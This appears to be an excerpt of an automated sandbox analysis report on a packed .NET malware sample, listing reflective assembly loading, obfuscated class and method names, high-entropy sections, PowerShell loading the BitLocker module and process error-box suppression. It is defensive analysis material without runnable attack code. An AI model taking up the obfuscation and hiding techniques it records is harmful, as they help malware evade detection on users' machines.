Source: 0.2.2Lzx7LMDWV.exe.3606000.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_009F469C push edx; retf	0_2_009F46A2
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_009F4661 push edx; retf	0_2_009F4662
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_009F4798 push esi; retf	0_2_009F479A
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_009F4791 push esi; retf	0_2_009F4792
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_009F4758 push ebp; retf	0_2_009F4762
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CC9C30 push esp; retf 0532h	4_2_02CC9D55

Source: 2Lzx7LMDWV.exe

Static PE information: section name: .text entropy: 7.077834220569421

Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, RG4OeI2NURbtawJEbD.cs	High entropy of concatenated method names: 'Dispose', 'RAIXVEDtmG', 'ISJMG8vAcE', 'mx6eengVF2', 'fEVXwtVyMM', 'd18XzHxI77', 'ProcessDialogKey', 'kGDM2sRoKY', 'DTcMXygxcJ', 'JqsMMjHsq7'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, PU2K7iMImyQ5xnsaku.cs	High entropy of concatenated method names: 'FtGL8R9Jwp', 'nPcLKLHeYH', 'dPBLgnQDgO', 'oVnLUvV8A1', 'A0NLbNHIsg', 'hSCLhEXiHh', 'e3LLBxpmir', 'QZiLZ4LLyx', 'I2ZLCIewPH', 'dlCLJUH7MX'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, ioZCGEwUTGxy9yeG7B.cs	High entropy of concatenated method names: 'hw4agdcyk0', 'HeAaU06mKk', 'D8DaTdSjb6', 'KmDaGiXB52', 'sxgaFkXUDc', 'hTIa0NUHy8', 'rQRapjiKoo', 'Q2LaSMpfW4', 'pTValpD4LJ', 'fqaaOadrCn'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, Vb64uVH5tiNGkhXK8B.cs	High entropy of concatenated method names: 'OuZ4kqpgUq', 'ifq4vk1yvr', 'Eqc4IwGRiJ', 'dLX4Wu9dYF', 'tRv4xVxXRv', 'tj64RVqVws', 'rbr4uN9nje', 'mCd4outRLi', 'wPg4V9cJZO', 'fAh4wcwesh'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, ub9TFKZ0KZBZAlepeNS.cs	High entropy of concatenated method names: 'QgBC74fow8', 'XwaCQE2LR8', 'ANVC1wmFwp', 'WqbC8eBF8q', 'pb3Cym9gET', 'wdkCK4OFkW', 'DlkCHVeYPJ', 'cZZCg2s3uo', 'tlcCUBLxAA', 'WyaCNwmCkP'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, FNNZlUA2fX44yxwCTC.cs	High entropy of concatenated method names: 'OI667tX2gb', 'mQF6QdKVcP', 'zOY617Thhj', 'XPE68AHGY9', 'k696yr5LLy', 'Yu86KHef4K', 'Opf6Hoc64D', 'Laq6gGvnQC', 'C976UD01aZ', 'f5A6Nm329r'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, skUgunmROyEbe7NqEg.cs	High entropy of concatenated method names: 'ToString', 'oaShOwPCfU', 'yoqhGqnabE', 'JCehEVouDT', 'gvwhFytXss', 'eqHh0U9el8', 'QBPhifD6yX', 'ykwhpVywsv', 'dqxhST6IeI', 'GsKhrp5Pck'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, BL5KvL1Mly7E0axwHr.cs	High entropy of concatenated method names: 'gSY5qXZ5wr', 'zxd547lugL', 'nDl5nu02lL', 'aPI56osVY8', 'rXs5dpEFhX', 'SwSnxcCq9R', 'yQJnR0cOIe', 'Qwtnufjwtc', 'gu4noU1nye', 'SfsnVVQuAR'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, Br21BY9k0865n8am9b.cs	High entropy of concatenated method names: 'ONfbl9ZxHV', 'D7Vb3sTfcE', 'dxLbkrLwJM', 'If7bvxuYw7', 'rQubGnGeNR', 'mC1bEf5X2B', 'vekbFNbB1e', 'v9Fb05idQI', 'l5MbiGLicD', 'lbJbp14uQI'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, IKdPTdIkXKcVF8CKvD.cs	High entropy of concatenated method names: 'Xb3CX1Jywd', 'ga7CjEGokC', 'cEaCsXqn6n', 'dPFCYT9VNO', 'puAC4swHBG', 'XLRCnCTUdJ', 'nK2C5b3HL4', 'X9BZuokR3a', 'PYrZoIhtLv', 'mPjZV5qDUM'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, lnWl7rZivkLoetqva2s.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'twiJkaIXqT', 'Lq4JvsNhdc', 'SAhJIbUTD8', 'ipOJWwgKPe', 'toKJxJWJsZ', 'kXKJR0jDpl', 'SgyJuHYSjf'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, sxHYhIdakXuHtwS78C.cs	High entropy of concatenated method names: 'VBAX6OYr9U', 'jpyXdiB756', 'MhZXANExTg', 'hi2Xt3IgcG', 'K0bXbgn4RX', 'wTLXh12ILJ', 'c2GvPNybI9MjfmrF82', 'Kc5g0lK9Xsr528Tdpc', 'mygXXv0yKM', 'H2lXjO60pX'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, BmHy4FcGOEpCWi3opG.cs	High entropy of concatenated method names: 'XDbBoLFuHb', 'VIfBwPTmSX', 'msuZ2C0mmW', 'RxrZXWWBwr', 'dUVBO9VbBw', 'lVpB3xK9KF', 'tAFBm94XBv', 'kPVBk4vqpE', 'Po5Bv0rHgD', 'YR4BIvBJYm'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, YNg0qF31LCM9VasJ1b.cs	High entropy of concatenated method names: 'ck6ZYN9qql', 'Wg9Z4T81mC', 'EXnZL7KWEE', 'hEIZn0xU0P', 'U33Z5Mvtyh', 'DqPZ6SrYLW', 'g3nZdS7DNp', 'lgrZDoaTLv', 'CdeZA6wyrW', 'TUIZtabu32'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, worj6AsQG0OlAGbUlY.cs	High entropy of concatenated method names: 'Q1Rjqs1W2R', 'JEmjYSWQkI', 'ErCj4pogEr', 'mUAjLVLmAY', 'XkPjnTqBHJ', 'KFdj5Zmf2B', 'z8Pj6VtDfb', 'Nntjdw3bmy', 'crtjDZuYL0', 'QpijA65tjP'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, h4fTbjFOWOq7K34SS5.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Vr1MVWv4tQ', 'FJFMwgjmtZ', 'HRYMz11y3o', 'YGwj2SnNui', 'vtdjXim8lU', 'Rm6jMO512L', 'S6AjjYcwO1', 'FJaGg1O5Xxec2sKjy2t'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, yp1tsyEObext7lkyx3.cs	High entropy of concatenated method names: 'KyZiEK0Yjjliklopo6k', 'r31XCM0IOVbXEG390ac', 'tmc5ZdNveE', 'L3E5CoF8Ms', 'wDa5J7759A', 'FTjgyP0xlxK4d1YiQP5', 'kOtvS10pRiVnH2FFD78'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, oyvNR2ndbC84tyB6uE.cs	High entropy of concatenated method names: 'wvGZTNeiuA', 'FLOZG6P8sS', 'p1vZEprKp3', 'fClZFR8HRE', 'TNeZkIVTr9', 'EjnZ0Kxcxy', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, cZtByPOtB9yaXbKTlg.cs	High entropy of concatenated method names: 'Kuv1P3Qm8', 'qQ080a8cF', 'xAlKuALGM', 'nxqHDmdIy', 'cOoU33I7X', 'RUUNP7Xb4', 'd93kS6TTvGgSmH35dK', 'GAj0943jA9Cb1yalpL', 'lxNZIGUZd', 'jrmJiqICL'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, jfgXAuzAsBxPqqT6RK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'grGCayLsLP', 'zDjCbHCmUN', 'agYChfqw3q', 'gDRCBmOGVc', 'waLCZ0t8fU', 'nk5CCyBD5S', 'H6eCJvplJo'
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, JXEQsFl5YEPSdgfNX9.cs	High entropy of concatenated method names: 'HKw6YMyS3E', 'dl06L0o8a8', 'Gqk65OStyr', 'KQl5w5eHwn', 'z1U5zipn1k', 'lcu627PmLN', 'udf6XM7E9V', 'MQn6MEG2T1', 'JpN6jOhQ85', 'BFP6sCq4kW'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, RG4OeI2NURbtawJEbD.cs	High entropy of concatenated method names: 'Dispose', 'RAIXVEDtmG', 'ISJMG8vAcE', 'mx6eengVF2', 'fEVXwtVyMM', 'd18XzHxI77', 'ProcessDialogKey', 'kGDM2sRoKY', 'DTcMXygxcJ', 'JqsMMjHsq7'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, PU2K7iMImyQ5xnsaku.cs	High entropy of concatenated method names: 'FtGL8R9Jwp', 'nPcLKLHeYH', 'dPBLgnQDgO', 'oVnLUvV8A1', 'A0NLbNHIsg', 'hSCLhEXiHh', 'e3LLBxpmir', 'QZiLZ4LLyx', 'I2ZLCIewPH', 'dlCLJUH7MX'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, ioZCGEwUTGxy9yeG7B.cs	High entropy of concatenated method names: 'hw4agdcyk0', 'HeAaU06mKk', 'D8DaTdSjb6', 'KmDaGiXB52', 'sxgaFkXUDc', 'hTIa0NUHy8', 'rQRapjiKoo', 'Q2LaSMpfW4', 'pTValpD4LJ', 'fqaaOadrCn'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, Vb64uVH5tiNGkhXK8B.cs	High entropy of concatenated method names: 'OuZ4kqpgUq', 'ifq4vk1yvr', 'Eqc4IwGRiJ', 'dLX4Wu9dYF', 'tRv4xVxXRv', 'tj64RVqVws', 'rbr4uN9nje', 'mCd4outRLi', 'wPg4V9cJZO', 'fAh4wcwesh'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, ub9TFKZ0KZBZAlepeNS.cs	High entropy of concatenated method names: 'QgBC74fow8', 'XwaCQE2LR8', 'ANVC1wmFwp', 'WqbC8eBF8q', 'pb3Cym9gET', 'wdkCK4OFkW', 'DlkCHVeYPJ', 'cZZCg2s3uo', 'tlcCUBLxAA', 'WyaCNwmCkP'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, FNNZlUA2fX44yxwCTC.cs	High entropy of concatenated method names: 'OI667tX2gb', 'mQF6QdKVcP', 'zOY617Thhj', 'XPE68AHGY9', 'k696yr5LLy', 'Yu86KHef4K', 'Opf6Hoc64D', 'Laq6gGvnQC', 'C976UD01aZ', 'f5A6Nm329r'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, skUgunmROyEbe7NqEg.cs	High entropy of concatenated method names: 'ToString', 'oaShOwPCfU', 'yoqhGqnabE', 'JCehEVouDT', 'gvwhFytXss', 'eqHh0U9el8', 'QBPhifD6yX', 'ykwhpVywsv', 'dqxhST6IeI', 'GsKhrp5Pck'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, BL5KvL1Mly7E0axwHr.cs	High entropy of concatenated method names: 'gSY5qXZ5wr', 'zxd547lugL', 'nDl5nu02lL', 'aPI56osVY8', 'rXs5dpEFhX', 'SwSnxcCq9R', 'yQJnR0cOIe', 'Qwtnufjwtc', 'gu4noU1nye', 'SfsnVVQuAR'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, Br21BY9k0865n8am9b.cs	High entropy of concatenated method names: 'ONfbl9ZxHV', 'D7Vb3sTfcE', 'dxLbkrLwJM', 'If7bvxuYw7', 'rQubGnGeNR', 'mC1bEf5X2B', 'vekbFNbB1e', 'v9Fb05idQI', 'l5MbiGLicD', 'lbJbp14uQI'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, IKdPTdIkXKcVF8CKvD.cs	High entropy of concatenated method names: 'Xb3CX1Jywd', 'ga7CjEGokC', 'cEaCsXqn6n', 'dPFCYT9VNO', 'puAC4swHBG', 'XLRCnCTUdJ', 'nK2C5b3HL4', 'X9BZuokR3a', 'PYrZoIhtLv', 'mPjZV5qDUM'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, lnWl7rZivkLoetqva2s.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'twiJkaIXqT', 'Lq4JvsNhdc', 'SAhJIbUTD8', 'ipOJWwgKPe', 'toKJxJWJsZ', 'kXKJR0jDpl', 'SgyJuHYSjf'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, sxHYhIdakXuHtwS78C.cs	High entropy of concatenated method names: 'VBAX6OYr9U', 'jpyXdiB756', 'MhZXANExTg', 'hi2Xt3IgcG', 'K0bXbgn4RX', 'wTLXh12ILJ', 'c2GvPNybI9MjfmrF82', 'Kc5g0lK9Xsr528Tdpc', 'mygXXv0yKM', 'H2lXjO60pX'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, BmHy4FcGOEpCWi3opG.cs	High entropy of concatenated method names: 'XDbBoLFuHb', 'VIfBwPTmSX', 'msuZ2C0mmW', 'RxrZXWWBwr', 'dUVBO9VbBw', 'lVpB3xK9KF', 'tAFBm94XBv', 'kPVBk4vqpE', 'Po5Bv0rHgD', 'YR4BIvBJYm'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, YNg0qF31LCM9VasJ1b.cs	High entropy of concatenated method names: 'ck6ZYN9qql', 'Wg9Z4T81mC', 'EXnZL7KWEE', 'hEIZn0xU0P', 'U33Z5Mvtyh', 'DqPZ6SrYLW', 'g3nZdS7DNp', 'lgrZDoaTLv', 'CdeZA6wyrW', 'TUIZtabu32'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, worj6AsQG0OlAGbUlY.cs	High entropy of concatenated method names: 'Q1Rjqs1W2R', 'JEmjYSWQkI', 'ErCj4pogEr', 'mUAjLVLmAY', 'XkPjnTqBHJ', 'KFdj5Zmf2B', 'z8Pj6VtDfb', 'Nntjdw3bmy', 'crtjDZuYL0', 'QpijA65tjP'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, h4fTbjFOWOq7K34SS5.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Vr1MVWv4tQ', 'FJFMwgjmtZ', 'HRYMz11y3o', 'YGwj2SnNui', 'vtdjXim8lU', 'Rm6jMO512L', 'S6AjjYcwO1', 'FJaGg1O5Xxec2sKjy2t'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, yp1tsyEObext7lkyx3.cs	High entropy of concatenated method names: 'KyZiEK0Yjjliklopo6k', 'r31XCM0IOVbXEG390ac', 'tmc5ZdNveE', 'L3E5CoF8Ms', 'wDa5J7759A', 'FTjgyP0xlxK4d1YiQP5', 'kOtvS10pRiVnH2FFD78'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, oyvNR2ndbC84tyB6uE.cs	High entropy of concatenated method names: 'wvGZTNeiuA', 'FLOZG6P8sS', 'p1vZEprKp3', 'fClZFR8HRE', 'TNeZkIVTr9', 'EjnZ0Kxcxy', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, cZtByPOtB9yaXbKTlg.cs	High entropy of concatenated method names: 'Kuv1P3Qm8', 'qQ080a8cF', 'xAlKuALGM', 'nxqHDmdIy', 'cOoU33I7X', 'RUUNP7Xb4', 'd93kS6TTvGgSmH35dK', 'GAj0943jA9Cb1yalpL', 'lxNZIGUZd', 'jrmJiqICL'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, jfgXAuzAsBxPqqT6RK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'grGCayLsLP', 'zDjCbHCmUN', 'agYChfqw3q', 'gDRCBmOGVc', 'waLCZ0t8fU', 'nk5CCyBD5S', 'H6eCJvplJo'
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, JXEQsFl5YEPSdgfNX9.cs	High entropy of concatenated method names: 'HKw6YMyS3E', 'dl06L0o8a8', 'Gqk65OStyr', 'KQl5w5eHwn', 'z1U5zipn1k', 'lcu627PmLN', 'udf6XM7E9V', 'MQn6MEG2T1', 'JpN6jOhQ85', 'BFP6sCq4kW'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, RG4OeI2NURbtawJEbD.cs	High entropy of concatenated method names: 'Dispose', 'RAIXVEDtmG', 'ISJMG8vAcE', 'mx6eengVF2', 'fEVXwtVyMM', 'd18XzHxI77', 'ProcessDialogKey', 'kGDM2sRoKY', 'DTcMXygxcJ', 'JqsMMjHsq7'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, PU2K7iMImyQ5xnsaku.cs	High entropy of concatenated method names: 'FtGL8R9Jwp', 'nPcLKLHeYH', 'dPBLgnQDgO', 'oVnLUvV8A1', 'A0NLbNHIsg', 'hSCLhEXiHh', 'e3LLBxpmir', 'QZiLZ4LLyx', 'I2ZLCIewPH', 'dlCLJUH7MX'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, ioZCGEwUTGxy9yeG7B.cs	High entropy of concatenated method names: 'hw4agdcyk0', 'HeAaU06mKk', 'D8DaTdSjb6', 'KmDaGiXB52', 'sxgaFkXUDc', 'hTIa0NUHy8', 'rQRapjiKoo', 'Q2LaSMpfW4', 'pTValpD4LJ', 'fqaaOadrCn'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, Vb64uVH5tiNGkhXK8B.cs	High entropy of concatenated method names: 'OuZ4kqpgUq', 'ifq4vk1yvr', 'Eqc4IwGRiJ', 'dLX4Wu9dYF', 'tRv4xVxXRv', 'tj64RVqVws', 'rbr4uN9nje', 'mCd4outRLi', 'wPg4V9cJZO', 'fAh4wcwesh'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, ub9TFKZ0KZBZAlepeNS.cs	High entropy of concatenated method names: 'QgBC74fow8', 'XwaCQE2LR8', 'ANVC1wmFwp', 'WqbC8eBF8q', 'pb3Cym9gET', 'wdkCK4OFkW', 'DlkCHVeYPJ', 'cZZCg2s3uo', 'tlcCUBLxAA', 'WyaCNwmCkP'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, FNNZlUA2fX44yxwCTC.cs	High entropy of concatenated method names: 'OI667tX2gb', 'mQF6QdKVcP', 'zOY617Thhj', 'XPE68AHGY9', 'k696yr5LLy', 'Yu86KHef4K', 'Opf6Hoc64D', 'Laq6gGvnQC', 'C976UD01aZ', 'f5A6Nm329r'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, skUgunmROyEbe7NqEg.cs	High entropy of concatenated method names: 'ToString', 'oaShOwPCfU', 'yoqhGqnabE', 'JCehEVouDT', 'gvwhFytXss', 'eqHh0U9el8', 'QBPhifD6yX', 'ykwhpVywsv', 'dqxhST6IeI', 'GsKhrp5Pck'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, BL5KvL1Mly7E0axwHr.cs	High entropy of concatenated method names: 'gSY5qXZ5wr', 'zxd547lugL', 'nDl5nu02lL', 'aPI56osVY8', 'rXs5dpEFhX', 'SwSnxcCq9R', 'yQJnR0cOIe', 'Qwtnufjwtc', 'gu4noU1nye', 'SfsnVVQuAR'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, Br21BY9k0865n8am9b.cs	High entropy of concatenated method names: 'ONfbl9ZxHV', 'D7Vb3sTfcE', 'dxLbkrLwJM', 'If7bvxuYw7', 'rQubGnGeNR', 'mC1bEf5X2B', 'vekbFNbB1e', 'v9Fb05idQI', 'l5MbiGLicD', 'lbJbp14uQI'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, IKdPTdIkXKcVF8CKvD.cs	High entropy of concatenated method names: 'Xb3CX1Jywd', 'ga7CjEGokC', 'cEaCsXqn6n', 'dPFCYT9VNO', 'puAC4swHBG', 'XLRCnCTUdJ', 'nK2C5b3HL4', 'X9BZuokR3a', 'PYrZoIhtLv', 'mPjZV5qDUM'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, lnWl7rZivkLoetqva2s.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'twiJkaIXqT', 'Lq4JvsNhdc', 'SAhJIbUTD8', 'ipOJWwgKPe', 'toKJxJWJsZ', 'kXKJR0jDpl', 'SgyJuHYSjf'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, sxHYhIdakXuHtwS78C.cs	High entropy of concatenated method names: 'VBAX6OYr9U', 'jpyXdiB756', 'MhZXANExTg', 'hi2Xt3IgcG', 'K0bXbgn4RX', 'wTLXh12ILJ', 'c2GvPNybI9MjfmrF82', 'Kc5g0lK9Xsr528Tdpc', 'mygXXv0yKM', 'H2lXjO60pX'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, BmHy4FcGOEpCWi3opG.cs	High entropy of concatenated method names: 'XDbBoLFuHb', 'VIfBwPTmSX', 'msuZ2C0mmW', 'RxrZXWWBwr', 'dUVBO9VbBw', 'lVpB3xK9KF', 'tAFBm94XBv', 'kPVBk4vqpE', 'Po5Bv0rHgD', 'YR4BIvBJYm'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, YNg0qF31LCM9VasJ1b.cs	High entropy of concatenated method names: 'ck6ZYN9qql', 'Wg9Z4T81mC', 'EXnZL7KWEE', 'hEIZn0xU0P', 'U33Z5Mvtyh', 'DqPZ6SrYLW', 'g3nZdS7DNp', 'lgrZDoaTLv', 'CdeZA6wyrW', 'TUIZtabu32'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, worj6AsQG0OlAGbUlY.cs	High entropy of concatenated method names: 'Q1Rjqs1W2R', 'JEmjYSWQkI', 'ErCj4pogEr', 'mUAjLVLmAY', 'XkPjnTqBHJ', 'KFdj5Zmf2B', 'z8Pj6VtDfb', 'Nntjdw3bmy', 'crtjDZuYL0', 'QpijA65tjP'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, h4fTbjFOWOq7K34SS5.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Vr1MVWv4tQ', 'FJFMwgjmtZ', 'HRYMz11y3o', 'YGwj2SnNui', 'vtdjXim8lU', 'Rm6jMO512L', 'S6AjjYcwO1', 'FJaGg1O5Xxec2sKjy2t'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, yp1tsyEObext7lkyx3.cs	High entropy of concatenated method names: 'KyZiEK0Yjjliklopo6k', 'r31XCM0IOVbXEG390ac', 'tmc5ZdNveE', 'L3E5CoF8Ms', 'wDa5J7759A', 'FTjgyP0xlxK4d1YiQP5', 'kOtvS10pRiVnH2FFD78'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, oyvNR2ndbC84tyB6uE.cs	High entropy of concatenated method names: 'wvGZTNeiuA', 'FLOZG6P8sS', 'p1vZEprKp3', 'fClZFR8HRE', 'TNeZkIVTr9', 'EjnZ0Kxcxy', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, cZtByPOtB9yaXbKTlg.cs	High entropy of concatenated method names: 'Kuv1P3Qm8', 'qQ080a8cF', 'xAlKuALGM', 'nxqHDmdIy', 'cOoU33I7X', 'RUUNP7Xb4', 'd93kS6TTvGgSmH35dK', 'GAj0943jA9Cb1yalpL', 'lxNZIGUZd', 'jrmJiqICL'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, jfgXAuzAsBxPqqT6RK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'grGCayLsLP', 'zDjCbHCmUN', 'agYChfqw3q', 'gDRCBmOGVc', 'waLCZ0t8fU', 'nk5CCyBD5S', 'H6eCJvplJo'
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, JXEQsFl5YEPSdgfNX9.cs	High entropy of concatenated method names: 'HKw6YMyS3E', 'dl06L0o8a8', 'Gqk65OStyr', 'KQl5w5eHwn', 'z1U5zipn1k', 'lcu627PmLN', 'udf6XM7E9V', 'MQn6MEG2T1', 'JpN6jOhQ85', 'BFP6sCq4kW'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
